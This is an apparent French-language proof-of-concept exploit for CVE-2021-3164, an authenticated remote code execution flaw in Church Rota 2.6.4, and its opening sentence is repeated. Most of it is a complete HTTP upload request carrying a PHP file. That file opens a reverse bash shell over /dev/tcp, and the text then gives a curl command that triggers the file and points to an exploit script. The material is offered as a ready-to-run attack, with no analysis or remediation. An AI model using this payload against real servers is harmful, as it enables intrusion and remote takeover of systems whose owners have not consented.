
Church Rota version 2.6.4 est vulnérable à une exécution de code à distance authentifiée. L'utilisateur n'a pas besoin d'avoir la permission de téléversement de fichier pour téléverser et exécuter un fichier arbitraire. L'application est écrite principalement avec PHP, donc nous utilisons PHP dans notre PoC.
Church Rota version 2.6.4 est vulnérable à une exécution de code à distance authentifiée. L'utilisateur n'a pas besoin de disposer de la permission de téléversement de fichier pour téléverser et exécuter un fichier arbitraire.
Après vous être connecté à Church Rota, envoyez la requête suivante, en remplaçant par votre PHPSESSID :
POST /resources.php?action=newsent HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------78920178725041013532564196488
Content-Length: 571
Origin: http://localhost:8081
Connection: close
Referer: http://localhost:8081/resources.php?action=new
Cookie: PHPSESSID=ivaa0ck3snt9ajlm0od9d7lh4j
Upgrade-Insecure-Requests: 1
-----------------------------78920178725041013532564196488
Content-Disposition: form-data; name="resourcename"
exec
-----------------------------78920178725041013532564196488
Content-Disposition: form-data; name="resourcefile"; filename="exec.php"
Content-Type: text/plain
<?php
exec("/bin/bash -c 'bash -i > /dev/tcp/127.0.0.1/1234 0>&1'");
?>
-----------------------------78920178725041013532564196488
Content-Disposition: form-data; name="resourcedescription"
<p>text file upload</p>
-----------------------------78920178725041013532564196488--
Le fichier peut ensuite être exécuté avec la commande suivante :
curl localhost:80/documents/exec.php
ou en cliquant sur le fichier sous « resources » dans l'interface web.
Ou simplement installez pwntools et requests avec pip, puis configurez et lancez le script d'exploitation fourni cve-2021-3164.py.